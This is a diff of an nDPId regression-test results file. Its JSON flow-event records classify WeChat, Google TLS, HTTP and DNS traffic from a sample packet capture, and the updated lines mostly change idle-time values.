+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7560000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7560000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171268754,"flow_last_seen":1492171273759,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -655,24 +655,24 @@ 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171268427,"flow_last_seen":1492171273433,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 